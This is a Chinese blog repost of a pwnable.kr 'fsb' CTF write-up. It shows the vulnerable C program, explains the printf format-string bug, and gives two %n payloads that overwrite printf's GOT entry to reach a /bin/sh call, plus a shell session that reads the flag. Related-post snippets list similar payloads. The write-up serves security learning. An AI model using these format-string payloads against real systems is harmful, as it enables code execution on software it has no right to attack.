【pwnable.kr】 fsb

最新推荐文章于 2022-02-05 00:23:45 发布
最新推荐文章于 2022-02-05 00:23:45 发布
阅读量563 收藏 1
点赞数 1
分类专栏: Pwnable.kr

https://r00tnb.github.io/2018/02/27/pwnable.kr-fsb/

前言

这是一道考察printf格式化字符串漏洞利用的题目,总的来说很简单,但是我却花了很长时间,主要是我有点太马虎没仔细分析代码,笑哭。

分析

先分析源代码fsb.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

#include <stdio.h>
#include <alloca.h>
#include <fcntl.h>

unsigned long long key;
char buf[100];
char buf2[100];

int fsb(char** argv, char** envp){
	char* args[]={"/bin/sh", 0};
	int i;

	char*** pargv = &argv;
	char*** penvp = &envp;
        char** arg;
        char* c;
        for(arg=argv;*arg;arg++) for(c=*arg; *c;c++) *c='\0';
        for(arg=envp;*arg;arg++) for(c=*arg; *c;c++) *c='\0';
	*pargv=0;
	*penvp=0;

	for(i=0; i<4; i++){
		printf("Give me some format strings(%d)\n", i+1);
		read(0, buf, 100);
		printf(buf);
	}

	printf("Wait a sec...\n");
        sleep(3);

        printf("key : \n");
        read(0, buf2, 100);
        unsigned long long pw = strtoull(buf2, 0, 10);
        if(pw == key){
                printf("Congratz!\n");
                execve(args[0], args, 0);
                return 0;
        }

        printf("Incorrect key \n");
	return 0;
}

int main(int argc, char* argv[], char** envp){

	int fd = open("/dev/urandom", O_RDONLY);
	if( fd==-1 || read(fd, &key, 8) != 8 ){
		printf("Error, tell admin\n");
		return 0;
	}
	close(fd);

	alloca(0x12345 & key);

	fsb(argv, envp); // exploit this format string bug!
	return 0;
}

 

程序先获得一个8字节的随机数存于全局变量key中,然后调用alloca函数在栈上分配内存。之后调用fsb函数。在这个函数内部要想达到exeve函数执行shell,就必须输入正确的key值。
这个fsb函数在printf(buf)处存在格式化字符串漏洞,关于漏洞利用网上有很多就不罗嗦了。那么要getshell其实方法有很多,可以改写got表也可以leak出key的值。这里直接改写got表好了,可以把printf的地址改写为要执行shell的地址,这样当执行printf时就跳到shell中了。
下面是exp

1
2
3

//各种地址和偏移在反汇编代码中就可以看出来,就不一一分析了
%134520836c%14$n //把printf的got表地址写入fsb函数的第一个参数中(方法很多你可以写到栈上的很多位置)
%134514347c%20$n //向printf的got表写入要执行shell的地址

 

1
2
3
4
5
6
7
8

fsb@ubuntu:~$ ./fsb >/dev/null 2>&1
%134520836c%14$n
%134514347c%20$n
cat flag >/tmp/flag
exit
fsb@ubuntu:~$ cat /tmp/flag
Have you ever saw an example of utilizing [n] format character?? :(
fsb@ubuntu:~$

要注意的是需要把程序的标准输出和错误输出重定向到/dev/null,这样就不会因为输出数据过多而卡死了。

总结

还是简单的格式化字符串漏洞的题目,利用方法很多,当时因为一直想通过alloca函数来计算key而浪费了很多时间,然而这样计算出来的只是前4字节,唉要细心啊。。

TYW----子曰小玖
关注
专栏目录
pwn学习:pwnable.kr bof
Richard_pl的博客
03-12 473
Day 3: Study pwn via pwnable.kr——bof 写在前面: 记录自己的学习过程,从零开始。。。第三天!!! 首先下载文件 打开.c文件查看源码 可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。 使用gdb打开二进制文件 也可以通过IDA进行分析 打开文件,查看文件开启的保护措施并设置若干断点。 通过汇编程序查找到相关变量的地址 我们的最终目的...
PWN flag [pwnable.kr]CTF writeup题解系列4
重新启程
01-01 961
直接看题目 这是一道逆向题目,直接下载下来看看 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/flag --2020-01-01 09:37:31-- http://pwnable.kr/bin/flag Resolving pwnable.kr (pwnable.kr)... 128.61.240.205 ...
pwnable.kr fsb writeup
charlie_heng的专栏
02-12 612
打完之后看了下别人的wp…..发现我的完全是邪道……(后面又仔细看了下,发现并没有太邪道,其实也是差不多 因为用ssh登录上去执行,所以可以把输出重定向一下 /dev/null 2&gt;&amp;1 这样就可以避免因为传输东西太多而卡死 然后可以直接用下面payload %134520928c%14$n %20$n %134520932c%14$n %20$n 之后就可以拿到一个sh...
pwnable.kr fsb 知识点总结
qq_43189757的博客
07-12 366
这题是关于格式化字符串漏洞的题目 对于%n 写数据以前一直很模糊,不知道是往栈上写数据,还是以栈上的地址指向的地方写数据,好好想了这题后明白了,%n 是往栈上的地址指向的地址处写入数据 比如: printf(“pwn%n”, &a); printf("%d\n", a); 32位下 会先把&a 压入栈中,在压入format_addr,然后call printf 此时栈上的情况为:...
[BUUCTF-pwn] pwnable_fsb
weixin_52640415的博客
02-05 815
首先是一个小坑,坑人的坑。题目给的32位no PIE的程序与远程上的不同,远程是64位开PIE。 程序先作了一个抬栈,然后可以输入4次printf,再输入key相同则给出shell (远程有原码,很容易看) #include <stdio.h> #include <alloca.h> #include <fcntl.h> unsigned long long key; char buf[100]; char buf2[100]; int fsb(char** a
pwnable.kr fsb题解
落日领航员の技术栈
04-21 451
漏洞分析YM老师布置的大作业,老师钦点我们组做unexploitable,难度吓人,看了一堆wp,毫无思路,遂自闭,于是先看一个稍微简单一点的格式化字符串漏洞题,收获不小,故写一篇博客记录下来,也希望能帮助到别人 代码分析 #include <stdio.h> #include <alloca.h> #include <fcntl.h> unsigned long long key; char buf[100]; char buf2[100]; int fsb(cha
apachecn#apachecn-ctf-wiki#PWN-dragon-echo1-echo2-[pwnable.kr]CT
07-25
1. malloc person 2. malloc dragon 3. free dragon
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 718
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
pwnable.kr-fix
r00tnb的博客
02-28 881
前言 看似简单的改代码题,但是还是需要强大的汇编知识。花了很长时间,主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。 分析 先分析源码fix.c #include &amp;lt;stdio.h&amp;gt; // 23byte shellcode from http://shell-storm...
pwnable.kr之asm
Jason_ZhouYetao的博客
07-23 593
这题我认为主要考察的知识点一个是沙箱中可用函数还有就是shellcode这个大头问题。 首先看看这道题目的代码: root@kali:~# ssh asm@pwnable.kr -p2222 asm@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | ...
FSB音频文件解码
12-14
该工具是本人找到的可以解压出.fsb文件中的wav音频的软件,并且解压出即可播放。工具目录不能有中文,使用时用把fsb文件拖动以fsb_aud_extr.exe打开即可。
fsb音频解包工具2011最新版
01-31
fsb音频解包工具 国外网站发现的宝贝 可用于 极品飞车 阿帕奇空中冲突 孤岛危机(音效部分)等的提取
pwnable 笔记 Rookiss - fsb - 20 pt
HiTaQini
12-17 3166
典型的格式化字符串漏洞
pwnable学习笔记-fsb
will_wind的博客
06-17 1175
这是一道有趣的格式化字符串漏洞(Format string bug)。
pwnable.kr-fd
weixin_30326515的博客
05-12 85
题目: 链接登录: ssh fd@pwnable.kr -p2222 查看文件及权限: ls –al 看到flag文件,但是当前用户fd并没有读权限。 cat fd.c 分析程序: int argc 这个东东用来表示你在命令行下输入命令的时候,一共有多少个参数。比方说你的程序编译后,可执行文件是test.exe D:\tc2>test 这个时候,argc的值是1 但是 D:\tc2...
pwnable.kr记录
leeham的博客
08-25 626
pwnable.kr记录 fd col pof
pwnable.kr之shellshock
river
05-04 1117
shellshock 登陆上服务器看到有shellshock文件,还有一个bash文件,执行./shellshock shellshock不是CVE-20146271吗? 根据搜到的结果进行测试: 正常执行过程分析 Bash有一种独有的使用环境变量来定义函数的方法。如果环境变量的值以字符”(){”开头,那么这个变量就会被当作是一个导
pwnable.kr unexploitable题解
落日领航员の技术栈
04-25 801
前言 这次的大作业可以算是《漏洞分析》这门课有史以来难度最大的一次了。刚接触这道题的时候基本上没思路,加上心思浮躁,在网上疯狂找wp,看了十几篇依旧没看出个门道。于是决定静下心来,先仔细研读了几篇SROP相关的文章,了解基本原理,再一点一点地动手尝试。当然这个历程也是比较艰辛的,一次又一次把自己绕晕,失败,曾经很多次想过干脆换一道题算了,好在最后没有放弃,做出来了,收获满满。 代码分析 #include <stdio.h> void main(){ // no brute for
FMOD Sample Bank Generatorg工具
aucy327的博客
11-11 2075
需要用到电脑配合! 酷跑音乐文件: Sound目录里 BMG为背景音乐 GET为动作音乐 SFX为特效音乐 大家都知道,新版本之后酷跑的音乐变成fsb格式了。 这不是转码,而是一种压缩打包技术。 天美艺游工作室真的太小看我们了,以为用了偏门的打包技术,打包偏门的格式,我们就没办法修改?修改教程如下 需要用到的工具: Aezay FSB Extractor(解包工具) FMOD Sample Ban...
使用python 多线程爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站
最新发布
05-30
这个程序会爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站的前5页内容,并使用5个线程进行爬取,提高爬取效率。 你可以根据需要修改程序中的线程数量和爬取页面的数量。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值